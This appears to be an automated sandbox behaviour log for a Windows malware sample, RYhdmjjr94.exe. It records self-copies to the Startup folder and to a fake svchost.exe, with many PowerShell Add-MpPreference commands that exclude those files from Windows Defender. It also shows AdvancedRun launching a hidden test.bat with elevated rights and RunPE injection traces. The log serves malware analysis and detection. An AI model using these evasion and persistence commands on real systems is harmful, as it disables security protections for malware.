                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7004 -ip 7004
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe'
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RYhdmjjr94.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 2188
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exe' /SpecialRun 4101d8 5136
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exe' -Force
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: unknown unknown
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4328 -ip 4328
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 7004 -ip 7004
                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\Public\Documents\2FDD6624\svchost.exe' -Force
                Source: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\36029300-7d61-41e1-9521-12c4a6ab3f8e\AdvancedRun.exe' /SpecialRun 4101d8 3132
                Source: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\9de20bc9-aa79-424f-aee4-da91bc757ec8\AdvancedRun.exe' /SpecialRun 4101d8 4888
                Source: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\4a22a6d0-4aef-43ec-af0a-4fbe1184937f\AdvancedRun.exe' /SpecialRun 4101d8 7052
                Source: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\adcc6271-e229-4005-bcb6-10475704cb95\AdvancedRun.exe' /SpecialRun 4101d8 7032
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 6_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile created: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91Jump to behavior
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\36C95A71.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\Public\Documents\2FDD6624\svchost.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\866838ff-f925-41f4-be86-0619ea100a91\AdvancedRun.exeCode function: 5_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5056:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6984:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4328
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4944:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1284:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6380:120:WilError_01
                Source: RYhdmjjr94.exe, CBBBDD7A/u0038CE91158.csCryptographic APIs: 'CreateDecryptor'
                Source: 36C95A71.exe.0.dr, CBBBDD7A/u0038CE91158.csCryptographic APIs: 'CreateDecryptor'
                Source: svchost.exe.0.dr, CBBBDD7A/u0038CE91158.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RYhdmjjr94.exe.1e0000.0.unpack, CBBBDD7A/u0038CE91158.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RYhdmjjr94.exe.1e0000.17.unpack, CBBBDD7A/u0038CE91158.csCryptographic APIs: 'CreateDecryptor'
                Source: 0.0.RYhdmjjr94.exe.1e0000.1.unpack, CBBBDD7A/u0038CE91158.csCryptographic APIs: 'CreateDecryptor'
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\RYhdmjjr94.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: RYhdmjjr94.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: RYhdmjjr94.exeStatic file information: File size 1053624 > 1048576
                Source: RYhdmjjr94.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                Source: RYhdmjjr94.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: RYhdmjjr94.exe, 00000000.00000000.494947483.00000000039F0000.00000004.00000001.sdmp, AdvancedRun.exe, 00000005.00000000.265038309.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000006.00000000.271580968.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.396691992.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002C.00000002.422299694.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002D.00000002.415244376.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002E.00000000.412183018.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002F.00000002.420515454.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000030.00000002.437607056.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000031.00000000.424851624.000000000040C000.00000002.00020000.sdmp
                Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RYhdmjjr94.exe, 00000000.00000000.580652189.00000000064DD000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\Resources\new\Repo\Debug\private\RUNPE\JabrezRPE\JabrezRPE\obj\Debug\RunPE_MemoryProtection.pdb source: RYhdmjjr94.exe, 00000000.00000000.398079222.00000000036C9000.00000004.00000001.sdmp
                Source: Binary string: RYhdmjjr94.PDBnn source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: = a.pdb= source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: osymbols\exe\Microsoft.PythonTools.IronPython.pdb source: RYhdmjjr94.exe, 00000000.00000000.384305015.00000000006F8000.00000004.00000001.sdmp
                Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb* source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
                Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbote source: RYhdmjjr94.exe, 00000000.00000000.384774786.000000000089A000.00000004.00000020.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdbtl@ source: RYhdmjjr94.exe, 00000000.00000000.413650240.00000000064B9000.00000004.00000001.sdmp
